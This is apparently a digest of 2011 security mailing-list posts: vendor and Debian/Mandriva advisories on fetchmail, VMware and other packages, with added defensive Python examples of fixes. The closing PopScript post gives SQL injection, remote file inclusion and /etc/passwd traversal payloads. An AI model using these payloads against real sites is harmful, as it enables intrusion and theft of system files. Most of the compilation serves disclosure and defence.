fetchmail security announcement fetchmail-SA-2011-01 (CVE-2011-1947)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

fetchmail-SA-2011-01: Denial of service possible in STARTTLS mode

Topics:        fetchmail denial of service in STARTTLS protocol phases
Author:        Matthias Andree
Version:       1.0
Announced:     2011-06-06
Type:          Unguarded blocking I/O can cause indefinite application hang
Impact:        Denial of service
Danger:        low
CVE Name:      CVE-2011-1947
CVSSv2:        (AV:N/AC:M/Au:S/C:N/I:N/A:C/E:U/RL:O/RC:C)
CVSS scores:   4.7: Base 6.3 (Impact 6.9, Exploitability 6.8), Temporal 4.7
               This is calculated without Environmental Score.
URL:           http://www.fetchmail.info/fetchmail-SA-2011-01.txt
Project URL:   http://www.fetchmail.info/
Affects:       fetchmail releases 5.9.9 up to and including 6.3.19
Not affected:  fetchmail release 6.3.20 and newer
Corrected in:  2011-05-26 Git, among others, see commit 7dc67b8cf06f74aa57525279940e180c99701314
               2011-05-29 fetchmail 6.3.20-rc3 tarball (for testing)
               2011-06-06 fetchmail 6.3.20 release tarball

0. Release history
==================

2011-05-30 0.1 first draft (visible in Git and through oss-security)
2011-06-06 1.0 release

1. Background
=============

fetchmail is a software package to retrieve mail from remote POP3, IMAP, ETRN or ODMR servers and forward it to local SMTP or LMTP servers or message delivery agents.

fetchmail supports SSL and TLS security layers through the OpenSSL library, if enabled at compile time and also enabled at run time, both in SSL/TLS-wrapped mode on dedicated ports and in the in-band-negotiated STARTTLS and STLS modes on the regular protocol ports.

2. Problem description and Impact
=================================

Fetchmail version 5.9.9 introduced STLS support for POP3; version 6.0.0 added STARTTLS for IMAP. However, the actual S(TART)TLS-initiated in-band SSL/TLS negotiation was not guarded by a timeout.

Depending on the operating system's defaults for TCP stream keepalive, fetchmail hangs of more than one week after sending STARTTLS were observed when the connection failed without the operating system being notified, for instance through network outages or hard server crashes.

A malicious server that stops responding at the network level after acknowledging fetchmail's STARTTLS or STLS request can hold fetchmail in this protocol state, and thus render fetchmail unable to complete the poll or proceed to the next server, effecting a denial of service.

SSL-wrapped mode on dedicated ports was unaffected by this problem, so it can be used as a workaround.

3. Solution
===========

Install fetchmail 6.3.20 or newer.

The fetchmail source code is always available from http://developer.berlios.de/project/showfiles.php?group_id=1824.

Distributors are encouraged to review the NEWS file and move forward to 6.3.20, rather than backport individual security fixes, because doing so routinely misses other fixes crucial to fetchmail's proper operation, for which no security announcements are issued. Several such (long-standing) bugs were fixed through recent releases, and an erratum notice for SASL authentication was issued.

Fetchmail 6.3.X releases have always been made with a focus on unchanged user and program interfaces so as to avoid disruptions when upgrading from 6.3.X to 6.3.Y with Y > X. Care was taken to not change the interface incompatibly.

4. Workaround
=============

If supported by the server's configuration, fetchmail can be run in ssl-wrapped rather than starttls mode. To that end, the "ssl" and "sslproto ssl3" options must be added to the rcfile (replacing "sslproto tls1" where configured), or "--ssl --sslproto ssl3" can be given on the command line (where it applies to all poll configurations).

It is generally also advisable to enforce SSL certificate validation, by either using --sslcertck on the command line, using "sslcertck" in a default configuration entry of the rcfile, or using "sslcertck" in each of the relevant individual poll descriptions of the rcfile.

A. Copyright, License and Non-Warranty
======================================

(C) Copyright 2011 by Matthias Andree, matthias.and...@gmx.de. Some rights reserved.

This work is licensed under the Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 Germany License. To view a copy of this license, visit http://creativecommons.org/licenses/by-nc-nd/3.0/de/ or send a letter to Creative Commons, 171 Second Street, Suite 300, SAN FRANCISCO, CALIFORNIA 94105, USA.

THIS WORK IS PROVIDED FREE OF CHARGE AND WITHOUT ANY WARRANTIES. Use the information herein at your own risk.

END of fetchmail-SA-2011-01

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.16 (GNU/Linux)

iEYEARECAAYFAk3swwUACgkQvmGDOQUufZWaBACdHHSAiQZ5OIOur3vflKbzbIi2
WbkAni+ROgf+9IU1rE0j8RJKvzZrJfIP
=d/Bl
-----END PGP SIGNATURE-----
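The failure mode in section 2 is a blocking TLS handshake with no upper bound. The following added example (not fetchmail's code; the server, client and their names are constructed for this illustration) shows the shape of the fix: a POP3 STLS client that sets a socket timeout before the TLS upgrade, run against a test peer that acknowledges STLS and then goes silent, which is exactly the condition the advisory describes. With a timeout the client fails cleanly; with timeout=None the same code would block indefinitely.

```python
import socket
import ssl
import threading

# Added example, not fetchmail code: a bounded STLS upgrade against a peer
# that answers "+OK" to STLS and then never sends a TLS ServerHello.

HANDSHAKE_TIMEOUT = 2.0  # seconds; a guard of this kind is what 6.3.20 added


def start_silent_stls_server(stop_event):
    """Constructed test peer: greets, acknowledges STLS, then stays silent
    until stop_event is set (the CVE-2011-1947 condition). Returns its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        try:
            conn.sendall(b"+OK POP3 server ready\r\n")
            conn.recv(1024)                                 # the client's STLS line
            conn.sendall(b"+OK Begin TLS negotiation\r\n")
            stop_event.wait()                               # no TLS records follow, ever
        finally:
            conn.close()
            srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def pop3_stls(host, port, timeout):
    """Connect, issue STLS and upgrade to TLS.

    Returns "ok" when the handshake completes and "timeout" when the peer
    stalls for longer than `timeout` seconds. Passing timeout=None reproduces
    the unguarded blocking I/O of fetchmail releases before 6.3.20."""
    ctx = ssl.create_default_context()          # certificate validation stays on,
                                                # the analogue of sslcertck
    sock = socket.create_connection((host, port), timeout=timeout)
    try:
        if not sock.recv(1024).startswith(b"+OK"):
            return "bad-greeting"
        sock.sendall(b"STLS\r\n")
        if not sock.recv(1024).startswith(b"+OK"):
            return "stls-refused"
        # wrap_socket() performs the handshake immediately and honours the
        # timeout already set on the socket: this is the call that needs the guard.
        tls = ctx.wrap_socket(sock, server_hostname=host)
        tls.close()
        return "ok"
    except socket.timeout:
        return "timeout"
    finally:
        sock.close()


def demo():
    """Run the guarded client against the silent peer and return its verdict."""
    stop = threading.Event()
    port = start_silent_stls_server(stop)
    try:
        return pop3_stls("127.0.0.1", port, timeout=HANDSHAKE_TIMEOUT)
    finally:
        stop.set()


if __name__ == "__main__":
    print("STLS upgrade against a silent peer:", demo())
```

The timeout is set on the plain socket before the upgrade because Python's `wrap_socket()` inherits it for the handshake; a timeout applied only to the later TLS reads would leave the handshake itself unguarded, which is the gap the advisory describes.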
iDefense Security Advisory 05.03.11: Tom Sawyer GET Extension Factory COM Object Instantiation Memory Corruption Vulnerability
iDefense Security Advisory 05.03.11
http://labs.idefense.com/intelligence/vulnerabilities/
May 03, 2011

I. BACKGROUND

Tom Sawyer Software's GET Extension Factory is a component used for graph visualization application development. It is included in the VMware Infrastructure Client. For more information, please visit the vendor's website: http://www.tomsawyer.com/products/index.php

II. DESCRIPTION

Remote exploitation of a memory corruption vulnerability in Tom Sawyer Software's GET Extension Factory could allow an attacker to execute arbitrary code with the privileges of the affected user.

The vulnerability exists within the way that Internet Explorer instantiates GET Extension Factory COM objects, which are not intended to be created inside the browser. The object does not initialize properly, and this leads to a memory corruption vulnerability that an attacker can exploit to execute arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability would allow an attacker to execute arbitrary code with the privileges of the affected user. In order to exploit this vulnerability, an attacker would have to convince the target to visit a website. An attacker typically accomplishes this via social engineering or by injecting content into compromised, trusted sites.

IV. DETECTION

iDefense has confirmed Tom Sawyer's Default GET Extension Factory 5.5.2.237, tsgetxu71ex552.dll and tsgetx71ex552.dll, to be vulnerable. VMware VirtualCenter 2.5 Update 6 and Update 6a are vulnerable.

V. WORKAROUND

Setting the kill bit for those controls will prevent exploitation. The CLSIDs for the controls are A2282403-50DE-4A2E-A118-B90AEDB1ADCC and 575B655F-FED4-4EE1-8F62-0A69D404F46B.

VI. VENDOR RESPONSE

VMware Inc. has released patches to address this issue. Information about downloadable vendor updates can be found by clicking on the URLs shown.

http://www.vmware.com/security/advisories/VMSA-2011-0009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2011-2217 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

11/11/2008 Initial Vendor Notification
11/11/2008 Initial Vendor Reply
05/03/2011 Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Elazar Broad.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2011 Verisign

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
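The workaround in section V is the ActiveX kill bit. As an added example (not iDefense's or Tom Sawyer's code), the block below generates a .reg file that sets the kill bit for the two CLSIDs named in the advisory and, for verification after the fact, parses an exported .reg file back to list which CLSIDs actually have the bit set. The registry location and the 0x400 Compatibility Flags value are Microsoft's documented kill-bit mechanism; the Wow6432Node variant for 32-bit Internet Explorer on 64-bit Windows is included on the assumption that both views need covering.

```python
import re

# Added example, not from the advisory: kill-bit .reg generation and checking.
KILLBIT_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
KILLBIT_KEY_WOW64 = r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility"
KILLBIT_FLAG = 0x400  # Compatibility Flags bit that stops IE instantiating the control

# CLSIDs from section V of the advisory.
TOM_SAWYER_CLSIDS = [
    "A2282403-50DE-4A2E-A118-B90AEDB1ADCC",
    "575B655F-FED4-4EE1-8F62-0A69D404F46B",
]

CLSID_RE = re.compile(r"^[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}$")
KEY_RE = re.compile(
    r"^\[HKEY_LOCAL_MACHINE\\SOFTWARE\\(?:Wow6432Node\\)?Microsoft\\Internet Explorer"
    r"\\ActiveX Compatibility\\\{([0-9A-Fa-f-]{36})\}\]$"
)
FLAGS_RE = re.compile(r'^"Compatibility Flags"=dword:([0-9A-Fa-f]{8})$')


def normalize_clsid(clsid):
    """Accept {braced} or bare, any case; return canonical upper-case form."""
    c = clsid.strip().strip("{}").upper()
    if not CLSID_RE.match(c):
        raise ValueError("not a CLSID: %r" % clsid)
    return c


def killbit_reg_file(clsids, include_wow6432node=True):
    """Build .reg text that sets the kill bit for each CLSID given."""
    keys = [KILLBIT_KEY] + ([KILLBIT_KEY_WOW64] if include_wow6432node else [])
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in sorted({normalize_clsid(c) for c in clsids}):
        for key in keys:
            lines.append("[%s\\{%s}]" % (key, clsid))
            lines.append('"Compatibility Flags"=dword:%08x' % KILLBIT_FLAG)
            lines.append("")
    return "\r\n".join(lines)


def killbitted_clsids(reg_text):
    """Parse .reg text (e.g. an export of the ActiveX Compatibility key) and
    return the set of CLSIDs whose Compatibility Flags include the kill bit."""
    found = set()
    current = None
    for raw in reg_text.splitlines():
        line = raw.strip()
        key = KEY_RE.match(line)
        if key:
            current = key.group(1).upper()
            continue
        flags = FLAGS_RE.match(line)
        if flags and current and int(flags.group(1), 16) & KILLBIT_FLAG:
            found.add(current)
    return found


if __name__ == "__main__":
    text = killbit_reg_file(TOM_SAWYER_CLSIDS)
    print(text)
    print("kill bit set for:", sorted(killbitted_clsids(text)))
```

Import the generated file with regedit on an affected guest, then export the same key and feed the export to `killbitted_clsids()` to confirm both CLSIDs are listed.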
VMware Tools Multiple Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

VSR Security Advisory
http://www.vsecurity.com/

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: VMware Tools Multiple Vulnerabilities
Release Date:  2011-06-03
Application:   VMware Guest Tools
Severity:      High
Author:        Dan Rosenberg <drosenberg (at) vsecurity.com>
Vendor Status: Patch Released [2]
CVE Candidate: CVE-2011-1787, CVE-2011-2145, CVE-2011-2146
Reference:     http://www.vsecurity.com/resources/advisory/20110603-1/
- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
- -------------------

From [1]:

VMware Tools is a suite of utilities that enhances the performance of the virtual machine's guest operating system and improves management of the virtual machine. Without VMware Tools installed in your guest operating system, guest performance lacks important functionality.

Vulnerability Overview
- ----------------------

On February 17th, VSR identified multiple vulnerabilities in VMware Tools, a suite of utilities shipped by VMware with multiple product offerings, as well as by open-source distributions as the open-vm-tools package. The first of these issues results in a minor information disclosure vulnerability, while the second two issues may result in privilege escalation in a VMware guest with VMware Tools installed.

Product Background
- ------------------

VMware Tools includes mount.vmhgfs, a setuid-root utility that allows unprivileged users in a guest VM to mount HGFS shared folders. Also shipped with VMware Tools is vmware-user-suid-wrapper, a setuid-root utility which handles initial setup to prepare for running vmware-user, which grants users access to other utilities included with VMware Tools.

Vulnerability Details
- ---------------------

CVE-2011-2146:

The mount.vmhgfs utility makes a call to stat() to check for the existence and type (file, directory, etc.) of the user-supplied mountpoint, and provides an error message if the provided argument does not exist or is not a directory. Because mount.vmhgfs is setuid-root, a local attacker can leverage this behavior to identify whether a given path exists in the guest operating system and whether it is a file or directory, potentially violating directory permissions.

CVE-2011-1787:

The mount.vmhgfs utility checks that the user-provided mountpoint is owned by the user attempting to mount an HGFS share prior to performing the mount. However, a race condition exists between the time this checking is performed and when the mount is performed. Successful exploitation allows a local attacker to mount HGFS shares over arbitrary, potentially root-owned directories, subsequently allowing privilege escalation within the guest.

CVE-2011-2145:

The vmware-user-suid-wrapper utility attempts to create a directory at /tmp/VMwareDnD. Next, it makes calls to chown() and chmod() to make this directory root-owned and world-writable. By placing a symbolic link at the location of this directory, vmware-user-suid-wrapper will cause the symbolic link target to become world-writable, allowing local attackers to escalate privileges within the guest. Only FreeBSD and Solaris versions of VMware Tools are affected.

Versions Affected
- -----------------

VMware's advisory [2] indicates the following product versions are affected:

VMware Product   Product Version   Running on   Replace with / Apply Patch
==============   ===============   ==========   ==========================
vCenter          any               Windows      not affected
Workstation      7.1.x             Linux        7.1.4 or later*
Workstation      7.1.x             Windows      7.1.4 or later*
Player           3.1.x             Linux        3.1.4 or later*
Player           3.1.x             Windows      3.1.4 or later*
AMS              any               any          not affected
Fusion           3.1.x             OSX          Fusion 3.1.3 or later*
ESXi             4.1               ESXi         ESXi410-201104402-BG*
ESXi             4.0               ESXi         ESXi400-201104402-BG*
ESXi             3.5               ESXi         ESXe350-201105402-T-SG*
ESX              4.1               ESX          ESX410-201104401-SG*
ESX              4.0               ESX          ESX400-201104401-SG*
ESX              3.5               ESX          ESX350-201105406-SG*
ESX              3.0.3             ESX          not affected

The open-vm-tools package prior to version 2011.02.23-368700 is also affected.

Vendor Response
- ---------------

The following timeline details VMware's response to the reported issue:

2011-02-17  VMware receives initial vulnerability report
2011-02-17  VMware security team acknowledges receipt
2011-03-04  VMware provides status update
2011-03-04  VSR initiates discussion of disclosure date
2011-03-10  VMware responds, indicates internal coordination underway
2011-03-11  VSR
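CVE-2011-1787 and CVE-2011-2145 are two faces of the same mistake in a setuid helper: checking a path and then acting on the path, so that a symlink or a race between the two steps redirects the privileged operation. The following added example (not VMware's or VSR's code; the function names, the scratch directory and the "VMwareDnD" name under it are constructed for the illustration) puts the vulnerable path-based sequence next to a descriptor-based version that refuses symlinks with O_NOFOLLOW and performs the ownership check and the mode change on the same open descriptor, so there is no window between them. It runs as an ordinary user; the root-ownership requirement from the advisory is modelled as an `expected_uid` parameter.

```python
import os
import stat
import tempfile

# Added example, not VMware code: check-then-act on a path versus check-and-act
# on one open descriptor.

SHARED_MODE = 0o1777  # world-writable plus sticky bit, what a DnD spool directory needs


def setup_shared_dir_unsafe(path):
    """Path-based sequence of the kind described for CVE-2011-2145 (illustrative).
    Every call resolves `path` afresh, so a symlink planted at that name
    redirects chmod() to whatever the link points at."""
    if not os.path.isdir(path):   # isdir() follows symlinks: a link to a directory passes
        os.mkdir(path)
    os.chmod(path, SHARED_MODE)   # follows the symlink too: the target becomes world-writable


def setup_shared_dir_safe(path, expected_uid):
    """Create or adopt `path` without following symlinks, then check and modify
    the same open descriptor so no TOCTOU gap exists (the CVE-2011-1787 lesson)."""
    try:
        os.mkdir(path, 0o700)
    except FileExistsError:
        pass                      # pre-existing directory or a planted link; verified below
    # O_NOFOLLOW makes open() fail with ELOOP on a symlink; O_DIRECTORY rejects plain files.
    fd = os.open(path, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        st = os.fstat(fd)         # metadata of the object actually opened, not of the name
        if st.st_uid != expected_uid:
            raise PermissionError("%s is owned by uid %d, expected %d"
                                  % (path, st.st_uid, expected_uid))
        os.fchmod(fd, SHARED_MODE)  # acts on the descriptor, not on the name
    finally:
        os.close(fd)


def _mode(path):
    return stat.S_IMODE(os.stat(path).st_mode)


def _planted_link():
    """Constructed scenario: a private directory and, under the expected name,
    a symlink pointing at it."""
    base = tempfile.mkdtemp()
    target = os.path.join(base, "private")
    os.mkdir(target)
    os.chmod(target, 0o700)
    link = os.path.join(base, "VMwareDnD")
    os.symlink(target, link)
    return target, link


def demo_unsafe():
    """Mode of the private directory after the unsafe setup ran on the link."""
    target, link = _planted_link()
    setup_shared_dir_unsafe(link)
    return _mode(target)


def demo_safe():
    """(refused, mode of the private directory) after the safe setup ran on the link."""
    target, link = _planted_link()
    try:
        setup_shared_dir_safe(link, os.getuid())
        refused = False
    except OSError:               # ELOOP raised by O_NOFOLLOW
        refused = True
    return refused, _mode(target)


def demo_safe_on_real_dir():
    """Mode the safe setup gives a genuine, not-yet-existing directory."""
    path = os.path.join(tempfile.mkdtemp(), "VMwareDnD")
    setup_shared_dir_safe(path, os.getuid())
    return _mode(path)


if __name__ == "__main__":
    print("unsafe: private dir mode became %o" % demo_unsafe())
    print("safe:   refused=%s, private dir mode %o" % demo_safe())
    print("safe on a real directory: mode %o" % demo_safe_on_real_dir())
```

The same descriptor-based rule applies to the mount case: the ownership check and the mount must refer to one opened object (or the check must be repeated under a lock the attacker cannot break), because a check on a path name says nothing about what that name resolves to an instant later.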
[SECURITY] [DSA 2253-1] fontforge security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2253-1                   secur...@debian.org
http://www.debian.org/security/                           Thijs Kinkhorst
June 3, 2011                           http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : fontforge
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2010-4259
Debian Bug     : 605537

Ulrik Persson reported a stack-based buffer overflow flaw in FontForge, a font editor. When processing a crafted Bitmap Distribution Format (BDF) file, FontForge could crash or execute arbitrary code with the privileges of the user running FontForge.

For the oldstable distribution (lenny), this problem has been fixed in version 0.0.20080429-1+lenny2.

The stable distribution (squeeze), testing distribution (wheezy), and unstable distribution (sid) are not affected by this problem.

We recommend that you upgrade your fontforge packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJN6TbqAAoJEOxfUAG2iX57sXUH/jq43XDXkz8o03rw2Xm7kvnX
VGIrbvo3RGEZ2Pg2fNSIGx1F4MeuMrwA5+dm46mGqYzHvV54+aexIvY1b8bLJ/B3
YmNw0iQa5SSS4zFW+4vDAc5+UI/NqL6EsStdlELdBW0cXNaIUofxCnFl9SUuWb7z
D9Btrc09mfYs44VrarYm1YaOTT9NexIQzadvaLAHOwRuAR6mK3YrKcQhuR2Hblz6
ObMXTHaGpmHXCQx9nRPMDr2I/oA0ipiu7N9wzELs/Z2eiKda2Xhq0t+CqRjIOH5c
r0GAxZxHOlqwfBh3ouPlBaTLlltvHN7jsLG6Ojf1f/S6D88mkpIi88Mkj4wElNo=
=bA8W
-----END PGP SIGNATURE-----
AppSec USA 2011 CFP Reminder, CTF Pre-Conference Challenge #2
Hello netizens! This is an update about the OWASP AppSec USA 2011 software security conference in Minneapolis this September.

*** CALL FOR PAPERS ***

Have something important to say about software security? The OWASP AppSec USA 2011 Call for Papers is still open. We're looking for hardcore talks in cloud security, mobile security, new attacks and defenses, and straight-up software development platforms. Get your submission in before time runs out. And have your developer friends submit a talk!

http://www.appsecusa.org/talks.html

The AppSec USA 2011 talks will be delivered September 22-23, 2011 in Minneapolis, Minnesota. In addition to the talks, we'll have excellent keynote speakers such as Moxie Marlinspike.

*** CAPTURE THE FLAG PRE-CONFERENCE CHALLENGE #2 ***

Last month ChrisKarel won pre-conference challenge #1 for a pass to the OWASP AppSec USA 2011 talks. Congratulations, ChrisKarel!

For June, we're back with another chance for you to score a free conference pass and get a feel for the AppSec USA 2011 CTF challenges coming this September. Good luck.

http://www.appsecusa.org/ctf.html

*** TRAINING ***

We have awesome training at a fair price. Register for mobile security, penetration testing, secure coding, and attack detection and response courses being held September 20-21. Hurry before classes fill up.

http://www.appsecusa.org/training.html

*** MORE APPSEC USA 2011 ***

Check out www.appsecusa.org for other events including a 5K / 10K charity run, the first ever Women in AppSec grant, and a chance to have your own original music played at the conference.

Thanks to our wonderful supporters - check them out at www.appsecusa.org!

--
Adam Baso
OWASP AppSec USA 2011: Your life is in the cloud.
September 20-23 Training, Talks, CTF, Showroom, and More
www.appsecusa.org @appsecusa
[ MDVSA-2011:106 ] subversion
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2011:106
http://www.mandriva.com/security/
_______________________________________________________________________

Package : subversion
Date    : June 4, 2011
Affected: 2009.0, 2010.1, Corporate 4.0, Enterprise Server 5.0
_______________________________________________________________________

Problem Description:

Multiple vulnerabilities were discovered and corrected in subversion:

The mod_dav_svn Apache HTTPD server module will dereference a NULL pointer if asked to deliver baselined WebDAV resources, which can lead to a DoS (Denial Of Service) (CVE-2011-1752).

The mod_dav_svn Apache HTTPD server module may in certain scenarios enter a logic loop which does not exit and which allocates memory in each iteration, ultimately exhausting all the available memory on the server, which can lead to a DoS (Denial Of Service) (CVE-2011-1783).

The mod_dav_svn Apache HTTPD server module may leak to remote users the file contents of files configured to be unreadable by those users (CVE-2011-1921).

Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more: http://store.mandriva.com/product_info.php?cPath=149&products_id=490

The updated packages have been upgraded to the 1.6.17 version which is not vulnerable to these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1752
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1921
http://svn.apache.org/repos/asf/subversion/tags/1.6.17/CHANGES
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2009.0:
b7dcf908858e788c0321e13109163494  2009.0/i586/apache-mod_dav_svn-1.6.17-0.1mdv2009.0.i586.rpm
c403bbd6aedcd9426dc5cf72ef56d1a9  2009.0/i586/apache-mod_dontdothat-1.6.17-0.1mdv2009.0.i586.rpm
2f3d2373aed96710023c6a84819731f6  2009.0/i586/libsvn0-1.6.17-0.1mdv2009.0.i586.rpm
2b4a273ce742b44b5a18bfaba5b9e6af  2009.0/i586/libsvnjavahl1-1.6.17-0.1mdv2009.0.i586.rpm
e11fb3f919ab6358d3a3ac26d803715f  2009.0/i586/perl-SVN-1.6.17-0.1mdv2009.0.i586.rpm
745a88c6044f3cf2fda88bfc80500c1a  2009.0/i586/python-svn-1.6.17-0.1mdv2009.0.i586.rpm
7baab70f65cac6de36cede330f032cc5  2009.0/i586/ruby-svn-1.6.17-0.1mdv2009.0.i586.rpm
c15bd5f296328d65f2612a61238b0f01  2009.0/i586/subversion-1.6.17-0.1mdv2009.0.i586.rpm
b6c69f4a93490250bc4c1c29a51d0301  2009.0/i586/subversion-devel-1.6.17-0.1mdv2009.0.i586.rpm
6b780c034fcf7caa146ac495f74776fd  2009.0/i586/subversion-doc-1.6.17-0.1mdv2009.0.i586.rpm
51e8efe6c17057098eec1e9b0d9b305e  2009.0/i586/subversion-server-1.6.17-0.1mdv2009.0.i586.rpm
f974ca62b90d4db1f3eeb0dc80a06787  2009.0/i586/subversion-tools-1.6.17-0.1mdv2009.0.i586.rpm
804da077e30821641755625cb9f6f545  2009.0/i586/svn-javahl-1.6.17-0.1mdv2009.0.i586.rpm
9ac126adb88c745c67e55630c98f1dff  2009.0/SRPMS/subversion-1.6.17-0.1mdv2009.0.src.rpm

Mandriva Linux 2009.0/X86_64:
adf776406f42c9bb4c5928f8d16ad74f  2009.0/x86_64/apache-mod_dav_svn-1.6.17-0.1mdv2009.0.x86_64.rpm
f35384b836889e04b9d732045deacccb  2009.0/x86_64/apache-mod_dontdothat-1.6.17-0.1mdv2009.0.x86_64.rpm
cff7dcefaf6e8c3d0a7642a36661e803  2009.0/x86_64/lib64svn0-1.6.17-0.1mdv2009.0.x86_64.rpm
01019c76de0636f512bc1338a180ab1b  2009.0/x86_64/lib64svnjavahl1-1.6.17-0.1mdv2009.0.x86_64.rpm
74812d1b64db5301b1ed74db46dc08b6  2009.0/x86_64/perl-SVN-1.6.17-0.1mdv2009.0.x86_64.rpm
59e84aa6043fae46047327ac124771e9  2009.0/x86_64/python-svn-1.6.17-0.1mdv2009.0.x86_64.rpm
15fae543266ede69fa220419ca91bc8f  2009.0/x86_64/ruby-svn-1.6.17-0.1mdv2009.0.x86_64.rpm
cd9be5e2b3ba9497e7f8e42a8d0181e0  2009.0/x86_64/subversion-1.6.17-0.1mdv2009.0.x86_64.rpm
8e14979cf0ac190035fcb0ae994fe4d8  2009.0/x86_64/subversion-devel-1.6.17-0.1mdv2009.0.x86_64.rpm
4c2e1922b12202697983b567638c9b92  2009.0/x86_64/subversion-doc-1.6.17-0.1mdv2009.0.x86_64.rpm
a7e5997dc660568bafed59a7bab37578  2009.0/x86_64/subversion-server-1.6.17-0.1mdv2009.0.x86_64.rpm
936dc2d30cc5bb8f54b32d862af63f3d  2009.0/x86_64/subversion-tools-1.6.17-0.1mdv2009.0.x86_64.rpm
e40d82e0b13a180d2a3c2ed2cd356e52  2009.0/x86_64/svn-javahl-1.6.17-0.1mdv2009.0.x86_64.rpm
9ac126adb88c745c67e55630c98f1dff  2009.0/SRPMS/subversion-1.6.17-0.1mdv2009.0.src.rpm

Mandriva Linux 2010.1:
809c8316c0cf26a1aa7a26260ebd556b  2010.1/i586/apache-mod_dav_svn-1.6.17-0.1mdv2010.2.i586.rpm
1c5aa3316d62eb40cbda3e91b5a0dead  2010.1/i586/apache-mod_dontdothat-1.6.17-0.1mdv2010.2.i586.rpm
680745e35e66433826514dc65f748597  2010.1/i586/libsvn0-1.6.17-0.1mdv2010.2.i586.rpm
2e523e3262c4fa0d918f6667c8c00bf1  2010.1/i586/libsvn-gnome-keyring0-1.6.17-0.1mdv2010.2.i586.rpm
[SECURITY] [DSA 2254-1] oprofile security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -------------------------------------------------------------------------
Debian Security Advisory DSA 2254-1                   secur...@debian.org
http://www.debian.org/security/                             Luciano Bello
June 3, 2011                           http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : oprofile
Vulnerability  : command injection
Problem type   : local
Debian-specific: no
Debian bug     : 624212
CVE ID         : CVE-2011-1760

OProfile is a performance profiling tool which is configurable by opcontrol, its control utility. Stephane Chauveau reported several ways to inject arbitrary commands in the arguments of this utility. If a local unprivileged user is authorized by the sudoers file to run opcontrol as root, this user could use the flaw to escalate his privileges.

For the oldstable distribution (lenny), this problem has been fixed in version 0.9.3-2+lenny1.

For the stable distribution (squeeze), this problem has been fixed in version 0.9.6-1.1+squeeze1.

For the testing distribution (wheezy), this problem has been fixed in version 0.9.6-1.2.

For the unstable distribution (sid), this problem has been fixed in version 0.9.6-1.2.

We recommend that you upgrade your oprofile packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk3qdL0ACgkQHYflSXNkfP/FlACeJhDQcRMuQHvWHa25HnSdMECy
T90An1FejDYdiCPVthcunO2YytGOzc6e
=Weyj
-----END PGP SIGNATURE-----
PopScript Multiple Vulnerabilities
##
# Exploit Title: PopScript Multiple Vulnerabilities
# home : http://www.D99Y.com
# Google Dork: Do as you would be done by ; )
# Date: 5/6/2011
# Author: NassRawI
# Software Link: http://www.popscript.com/
##
#
# [1] SQL injection
#
# http://localhost/PopScript/index.php?act=inbox&mode=1    [ SQL injection ]
#
# [2] File inclusion = require()
#
# Remote File inclusion:
#
# exploit: send in index.php [ post ]
#
# email=r...@d99y.com&mode=[Shell txt]?&password=nassrawi&remember=ON
#
# Local:
#
# exploit: send in index.php [ post ]
#
# email=r...@d99y.com&mode=nassrawi../../../../../../etc/passwd&password=nassrawi
#
# You can skip protection include_path ; )
#
